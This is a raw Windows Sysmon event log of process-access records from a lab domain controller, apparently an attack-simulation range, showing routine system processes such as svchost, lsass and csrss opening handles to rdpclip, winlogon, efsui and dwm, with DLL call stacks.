13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009822Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009821Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009820Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009819Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009818Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009817Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009816Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4288-6000-1000-000000009A01}11364692C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009815Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|c:\windows\system32\lsm.dll+1cd9|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009814Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.451{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1c24|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009813Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009812Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009811Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009810Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009809Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009808Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.404{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4750-6000-0305-000000009A01}5072C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009807Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.389{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009806Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.389{08A6967A-4286-6000-0B00-000000009A01}852976C:\Windows\system32\lsass.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.373{08A6967A-4288-6000-1000-000000009A01}11362164C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.373{08A6967A-4288-6000-1000-000000009A01}11361600C:\Windows\system32\svchost.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.373{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009802Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.373{08A6967A-4750-6000-0205-000000009A01}47883780C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0C05-000000009A01}1120C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.373{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0605-000000009A01}4632C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.357{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 